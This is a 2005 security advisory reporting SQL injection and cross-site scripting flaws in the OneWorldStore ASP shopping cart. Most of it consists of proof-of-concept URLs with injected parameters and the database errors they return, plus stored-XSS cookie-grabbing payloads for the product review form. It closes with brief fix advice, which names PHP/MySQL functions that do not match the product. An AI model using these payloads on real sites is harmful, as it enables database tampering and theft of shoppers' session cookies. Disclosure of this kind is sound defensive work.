Multiple multiple sql injection/errors and xss vulnerabilities in OneWorldStore
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn
more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple multiple sql injection/errors and xss vulnerabilities in
OneWorldStore
Date: 14/04/2005
Vendor: OneWorldStore
Vendor Website: http://www.oneworldstore.com
Summary: There are, multiple sql injection/errors and xss vulnerabilities in
oneworldstore.
Proof of Concept Exploits:
http://example.com/owBasket/owAddItem.asp?idProduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT stock FROM Products WHERE idProduct = 'SQL_INJECTION
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owBasket/owAddItem.asp, line 48
http://example.com/owListProduct.asp?bSpecials='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM Categories WHERE idCategory = AND Active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owListProduct.asp, line 50
http://example.com/owListProduct.asp?idCategory='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM Categories WHERE idCategory = ''SQL AND Active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owListProduct.asp, line 50
http://example.com/owProductDetail.asp?idproduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owProductDetail.asp, line 647
http://example.com/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owProductDetail.asp, line 647
http://example.com/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab
Pops Cookie
http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64
Pops Cookie
http://example.com/owProductDetail.asp
Submitting the review form, with someething like
Name:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Email:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E@'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.com
Rating:5
Comment: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Would cause long lasting permanent XSS and steal the cookies of anyone who
visited the webpage.
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(),
mysql_real_escape_string() and other functions for input validation before
passing user input to the mysql database, or before echoing data on the screen,
would solve these problems.
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email:
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me
regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon
to come out book on Secure coding with php.